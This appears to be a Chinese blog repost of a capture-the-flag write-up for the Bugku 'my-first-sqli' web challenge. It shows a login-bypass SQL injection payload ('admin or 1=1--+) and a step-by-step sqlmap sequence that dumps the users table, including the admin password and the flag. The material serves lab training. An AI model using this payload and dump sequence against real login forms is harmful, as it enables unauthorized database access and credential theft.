当前位置：首页 > article >正文

Bugku CTF_Web——my-first-sqli

article 2024/11/24 19:26:05

Bugku CTF_Web——my-first-sqli

进入靶场

在这里插入图片描述

随便输一个看看

在这里插入图片描述

点login没有任何回显

方法一：

上bp抓包

在这里插入图片描述

放到repeter测试

在这里插入图片描述

试试万能密码（靶机过期了重新开了个靶机）

'admin or 1=1--+

在这里插入图片描述

shellmates{SQLi_goeS_BrrRrRR}

方法二：

拿包直接梭哈sqlmap

爆库

python sqlmap.py -r "***.txt"  --dbs

在这里插入图片描述

接着爆表

python sqlmap.py -r "***.txt"  -D SQLite --tables

+-------+
| users |
+-------+

在这里插入图片描述

爆字段

python sqlmap.py -r "***.txt"  -D SQLite -T users --columns

+----------+------+
| Column   | Type |
+----------+------+
| password | TEXT |
| username | TEXT |
+----------+------+

在这里插入图片描述

读取字段

查看username和password

python sqlmap.py -r "***.txt"  -D SQLite -T users -C username --dump

+----------+
| username |
+----------+
| admin    |
+----------+

在这里插入图片描述

接下来读取password就行了

python sqlmap.py -r "***.txt"  -D SQLite -T users -C password --dump

+----------------------------------------+
| password                               |
+----------------------------------------+
| sYbtomeoGjP62xPS05wqHY5R7cZqFW5jD0Cg6w |
+----------------------------------------+

在这里插入图片描述

登录试试

在这里插入图片描述

拿到flag

shellmates{SQLi_goeS_BrrRrRR}

在这里插入图片描述

查看全文

http://www.kler.cn/a/407584.html

若依-一个请求中返回多个表的信息

《AI大模型开发笔记》Faster-Whisper 免费开源的高性能语音识别模型

一文学习Android系统核心服务ServiceManager

聚水潭与MySQL数据集成案例分享

UVM 验证方法学之interface学习系列文章（七）高级《bind 操作》（4）级联

mysql的优化

使用Python生成F分布表并导出为Excel文件

linux从0到1——shell编程7

WPF绑定Bind方法合集，实时更新

YOLOv8-ultralytics-8.2.103部分代码阅读笔记-transformer.py

麒麟网络负载均衡与高可用方案实践

【数据结构OJ】【图论】货币套汇（图路径）

十、事件类型(鼠标事件、焦点.. 、键盘.. 、文本.. 、滚动..)、事件对象、事件流(事件捕获、事件冒泡、阻止冒泡和默认行为、事件委托)

【Python入门第七讲】列表（List）

Spire.PDF for .NET【页面设置】演示：打开 PDF 时自动显示书签或缩略图

chinaskills_cloud_iaas.iso镜像

数据库【锁】的分类

Typora+PicGo+云服务器搭建博客图床

Github 2024-11-23 Rust开源项目日报 Top10

KVM虚拟机拷贝与迁移

【强化学习的数学原理】第03课-贝尔曼最优公式-笔记

uniapp记录在微信小程序端修改复选框的样式

大数据面试题每日练习--HDFS是如何工作的？

如何通过OpenSSL来创建自签名的CA证书？

软件测试面试之常规问题

Vue3响应式原理

Bugku CTF_Web——my-first-sqli

方法一：

方法二：

相关文章：